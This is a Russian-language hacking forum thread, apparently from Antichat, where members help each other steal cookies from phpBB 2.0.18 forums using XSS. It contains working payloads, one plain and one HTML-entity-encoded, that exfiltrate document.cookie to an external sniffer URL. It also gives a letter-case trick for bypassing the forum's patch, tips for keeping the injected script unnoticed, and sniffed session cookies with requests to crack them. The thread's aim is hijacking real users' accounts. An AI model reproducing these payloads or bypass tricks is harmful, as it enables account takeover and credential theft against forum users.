Отснифал кукисы, могу зайти под юзером, но есть ли возможность расшифровать пароль?

a:2:{s:11:"autologinid";s:33:"1594701932437793947762e4.02269531";s:6:"userid";i:1161;}

1594701932437793947762e4.02269531 - Это какой алгоритм шифрования, :confused: :confused:

Спасибо за помощь! ;)

Может это поможет?
http://www.webmastertools.narod.ru/OnlineTools/url_decode.html

спасибо мне тоже это надо было =)

Да если не трудно, поставь весь код.

Короче добрые люди! (Полисос, тебя не спрашиваю)
Помогите! Как провести XSS-атаку на форум phpbb 2.0.18??????
Используй поиск античата.

Нет не ленивый , я всегда в поиске нового, пробывал XSS для этого, убрал все плюсики, но форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил, может ты сам объясниш?

Нет не ленивый , я всегда в поиске нового, пробывал XSS для этого, убрал все плюсики, но форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил, может ты сам объясниш?
Ну давай. Теги вообще на форуме работают та? Я и сам уберал, там всё работает значит ты что то не даубрал. Покажи что и как делаешь.

http://www.wj (http://wj.com/style=display:none;background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;) )

Ну так поможет? Подставь ; знак чтобы закрыть символ.

А вообще, преведи результат кода который ты постишь.

Я просто уже не знаю как его тут запостить, уже ведь и видео снял...и статью написал! :rolleyes:

Что ещё нужно?

Может народовский сайт создать а там в тексте мх

http://www.wj (http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;)

Я убераю все плюсики, но всё равно не пашет.

в html теги засунь.

Нет, результат в html засунь Я ведь не вижу если просто запостишь они просто на форуме сработают!

Покажи результат что ты делаешь, и засунь это всё так же в теги на античатовском форуме.

Работает только в ИЕ не забывай этого.

спасибо за такой хороший разказ, но вопрос про то как расшифровать ещё открыт! как?????????????
Ну как как. Я те ссылку дал. Надо ; в конец специальных символов подставить.

И да всегда пожалуйста.

Полисос! Тот код, что ты дал не работает!
Приведи результат который ты получаешь на форуме.

Нет не ленивый , я всегда в поиске нового, пробывал XSS для этого, убрал все плюсики, но форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил, может ты сам объясниш?
Преобразование идет из-за заплатки. Она стоит почти на всех 2.0.18 Но если код слегка подправить, он отлично работает. Заплатка отдыхает. Я подправил, у меня заработал код алерта на 2.0.18 и второй код пашет вроде.
Но у меня ламерский вопрос, на который очень прошу кого-нибудь ответить. Как при помощи этого кода воровать куки? Можно пошагово? Куда они прописываются? В этом коде надо что-то менять? Как взять куки конкретного юзера? (Я говорю о коде для phpbb 2.0.18 которые выше Polisos дал).

<<YaYaYa>> , Я еще раз говорю, я не знаю как отснифать куки поэтому и прошу это подробно объяснить.
У меня работает код алерта (исправленный). У тебя этот код работает? Что выдает форум?

Ты не можешь мне в личку или тут выложить этот код? и как ты понял, что код работает, если ьы даже не знаешь как куки отснифать...
напиши код, а я те скажу потом как его сделать под античатовский сниффер
ну лови в личку... просто все говорят, что и код алерта не работает, а он может работать. наверно, если код воровки исправить по тому же принципу, то и он заработает? (я предполагаю)

Куда ставить код? Как получить куки конкретного юзера? Где они пропишутся?
Как сам процесс идет, если код известен?

вот один из множества доступных снифферов. http://antichat.ru/sniff/
там всё написано....

<<YaYaYa>> , ты проверил с изменениями, которые я тебе в личку кинул? Работает?
Спасибо, кстати, за объяснение. Вроде бы понял... Если что, еще спрошу.

Кстати небольшой совет: для дополнительной страховки задавайте строчке скрипта размер 1. Тогда ваши возможные косяки во многих случаях пройдут незамеченными

...тебе сняли видео...
этого видео, как я понял на античате больше нет. :(
огромная просьба, если оно где-то есть, поделиться.
pls...

Его кажись уже нету. Попроси Администрацию, она выложит его на раздел http://video.antichat.ru/

...форум переобразует [url] в [eror_url], почему он так делает , некто мне до сех пор не объяснил...
Это заплатка. Обойти ее можно, если в коде "url" заменить везде на "URL". Просто регистр.

Отснифал кукисы, могу зайти под юзером, но есть ли возможность расшифровать пароль?

a:2:{s:11:"autologinid";s:33:"1594701932437793947762e4.02269531";s:6:"userid";i:1161;}

1594701932437793947762e4.02269531 - Это какой алгоритм шифрования, :confused: :confused:


Та же проблема. Декодер не помогает.
ПОМОГИТЕ pls, если кто может:

QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:33:"15539923884383294c4ad690.68000462";s:6:"userid";i:282;}; phpbb2mysql_sid=5bf8841fc40848e12f7f8c828e2287ed; hotlog=1; phpbb2mysql_t=a:1:{i:2744;i:1132669277;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"9262666414382ed705416c8.04124515";s:6:"userid";i:282;}

Как расшифровать?

С 18й версии в куках нет хэша. Вместо него пустота или примерно такое число 15539923884383294c4ad690.68000462
Совсем по другому обрабатываются сессии. Оч. интересно... Но не понятно.
Добавлено qBiN'ом:
Непонятно? Погляди в исходник! =)

Так че с такими куками делать? Расшифровать нельзя вроде, т е пароль уже не узнать?
Кстати, куки с пустым хэшем (хотя и был автологин) приходили с форума одного, хотя с него же приходили и нормальные. Это как так может получиться?

Да вообше странная вешь с куками под пхп бб у меня приходило по 2 сида

вот тут http://debug-mode.in/phpbb.txt статья по теме,думаю интересующимися проблемами куков в новых версиях phpBB будет интересна .